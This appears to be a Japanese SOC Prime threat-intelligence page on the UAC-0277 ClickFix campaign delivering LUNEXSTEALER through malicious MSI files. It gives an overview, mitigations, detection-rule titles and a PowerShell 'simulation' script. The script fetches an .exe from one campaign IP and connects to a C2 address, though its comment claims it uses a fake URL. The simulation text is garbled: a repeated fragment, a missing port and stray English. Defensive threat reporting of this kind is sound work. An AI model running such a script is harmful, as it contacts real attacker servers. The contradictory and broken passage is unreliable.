SOC Prime Bias: High

06 Oct 2026 14:30 UTC

UAC-0277の攻撃が悪性MSIとClickFixを通じてLUNEXSTEALERを配信

Author Photo
SOC Prime Team linkedin icon フォローする
UAC-0277の攻撃が悪性MSIとClickFixを通じてLUNEXSTEALERを配信
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

概要

UAC-0277として追跡されている脅威アクターが、正当なウェブサイトを侵害して悪意のあるJavaScriptを注入し、偽のCloudflare確認ページを通じてユーザーにコマンドを実行させようとしています。このClickFix技術は最終的に、LUNEXSTEALERまたは追加のローダーを含むMSIパッケージを届けるもので、BYOVDを活用してセキュリティコントロールを迂回します。キャンペーンはまた、PolygonやEthereum上でブロックチェーンベースのコマンド&コントロールインフラストラクチャを利用して攻撃者のリソースを動的に管理しています。

調査

CERT-UAは100以上の侵害されたウェブサイトを特定し、キャンペーンに関連する3つのMSIバリアントを分析しました。研究者たちは、FnHotkeyUtility.exeを含むDLLサイドローディングや、Windows Defenderの保護を回避するための脆弱なAMD PDFWKRNL.sysドライバーの悪用を観察しました。また、調査はLUNARAXEブラウザー拡張機能と、データ収集及び流出に使われるNAIVEMESS PowerShellコンポーネントを明らかにしました。

緩和策

管理者はグループポリシーを通じて「ファイル名を指定して実行」(Win+R)へのアクセスを制限し、MSIインストールの権限を認可されたユーザーに限定すべきです。Microsoftの脆弱なドライバーブロックリストを有効化することは、BYOVD攻撃のリスクを低減するために重要です。組織はまた、ブラウザー拡張機能の許可リストを施行し、リモートURLに関与する疑わしいmsiexec.exeコマンドライン活動を監視すべきです。

対応

疑わしいMSI実行や無許可のブラウザー拡張機能が検出された場合、影響を受けたホストを隔離し、LUNEXSTEALERに関連するプロセスを終了してください。psychedelicloveUtilsと名付けられたエントリのスケジュールされたタスクを確認し、Microsoft Office Word Editor拡張機能をブラウザープロファイルで調べてください。キャンペーンに関連する偽のCloudflare確認ページを特定した場合は、CERT-UAに報告してください。

攻撃フロー

検出

LOLBinセマンティクスを持つRunMRUエントリの疑わしい動作(registry_event経由)

SOC Primeチーム
2026年10月5日

リモートMSIファイルのインストール試行の可能性(cmdline経由)

SOC Primeチーム
2026年10月5日

疑わしいスケジュールされたタスク(audit経由)

SOC Primeチーム
2026年10月5日

ダイレクトIPを利用した疑わしいファイルダウンロード(proxy経由)

SOC Primeチーム
2026年10月5日

珍しいトップレベルドメイン(TLD)のDNS要求による疑わしいコマンド&コントロール(dns経由)

SOC Primeチーム
2026年10月5日

検出用IOC(HashSha256): UAC-0277キャンペーン: ClickFix技術による悪意のあるMSI配布及びLUNEXSTEALERマルウェアパート2

SOC Prime AIルール
2026年10月6日

検出用IOC(HashSha256): UAC-0277キャンペーン: ClickFix技術による悪意のあるMSI配布及びLUNEXSTEALERマルウェアパート1

SOC Prime AIルール
2026年10月6日

検出用IOC(HashMd5): UAC-0277キャンペーン: ClickFix技術による悪意のあるMSI配布及びLUNEXSTEALERマルウェアパート2

SOC Prime AIルール
2026年10月6日

検出用IOC(HashMd5): UAC-0277キャンペーン: ClickFix技術による悪意のあるMSI配布及びLUNEXSTEALERマルウェアパート1

SOC Prime AIルール
2026年10月6日

検出用IOC(SourceIP): UAC-0277キャンペーン: ClickFix技術による悪意のあるMSI配布及びLUNEXSTEALERマルウェア

SOC Prime AIルール
2026年10月6日

検出用IOC(DestinationIP): UAC-0277キャンペーン: ClickFix技術による悪意のあるMSI配布及びLUNEXSTEALERマルウェア

SOC Prime AIルール
2026年10月6日

HTTPおよびWebSocketを使用した悪意のあるC2サーバーとの相互作用の検出 [Windowsネットワーク接続]

SOC Prime AIルール
2026年10月6日

FnHotkeyUtilityがDLLサイドローディング経由で悪意のあるspkvol.dllを実行 [Windows Sysmon]

SOC Prime AIルール
2026年10月6日

Msiexecを使用した悪意のあるMSIパッケージのダウンロードおよび脆弱性の悪用 [Windowsプロセス作成]

SOC Prime AIルール
2026年10月6日

侵害されたウェブサイト上の悪意のあるJavaScriptの検出 [Webサーバー]

SOC Prime AIルール
2026年10月6日

シミュレーション実行

  • 攻撃の概要とコマンド: 攻撃者はドライブ・バイ感染を成功させました。持続性を確立し、次段階のマルウェアをダウンロードするために、植え付けたエージェントは psychedeliclove.exe というファイルを特定のURIから取得しようとします。同時に、193.178.159.128にある二次C2ノードへのビーコンを試み、 ポート を通じてWebSocketのようなHTTP接続を介して命令を受け取ろうとします。これらの特定の指標は、既存のプロキシ・ベースの検出ルールをトリガーすることを意図しています。 を通じてWebSocketのようなHTTP接続を介して命令を受け取ろうとします。これらの特定の指標は、既存のプロキシ・ベースの検出ルールをトリガーすることを意図しています。 to receive instructions via a WebSocket-like HTTP connection. These specific indicators are intended to trigger the existing proxy-based detection rules.

  • 回帰テストスクリプト:

    # 検出検証用シミュレーションスクリプト
    # 目的: 検出ルール中の特定のURLおよびIP/ポート指標をトリガーする。
    
    Write-Host "[*] シミュレーション開始中..." -ForegroundColor Cyan
    
    # 1. トリガー選択1: 悪意のあるURLパターン
    Write-Host "[*] 悪意のあるURLパターンへのアクセスを試みています..." -ForegroundColor Yellow
    try {
        # 実際の悪意のあるサイトにアクセスしないよう、非存在のローカルリスナーまたは偽のURLを使用します。
        # しかし、プロキシはリクエスト試行をログするべきです。
        Invoke-WebRequest -Uri "http://107.175.82.242:9000/wilow/psychedeliclove.exe" -ErrorAction SilentlyContinue
    } catch {
        Write-Host "[!] リクエストが失敗しました(期待通り)、しかしテレメトリが生成されるはずです。" -ForegroundColor Gray
    }
    
    # 2. トリガー選択2: 特定のIPとポート
    Write-Host "[*] ポート8080でC2 IPへの接続を試みています..." -ForegroundColor Yellow
    try {
        $client = New-Object System.Net.Sockets.TcpClient
        $client.Connect("193.178.159.128", 8080)
        $client.Close()
    } catch {
        Write-Host "[!] 接続が失敗しました(期待通り)、しかしプロキシログが試行を捕捉するはずです。" -ForegroundColor Gray
    }
    
    Write-Host "[*] シミュレーション完了。" -ForegroundColor Cyan
  • クリーンアップコマンド:

    # このシミュレーションによって持続的なファイルは作成されません。
    # 一時的なネットワーク接続のみが試みられます。
    Write-Host "[*] クリーンアップ完了。システムにアーティファクトは残りませんでした。" -ForegroundColor Green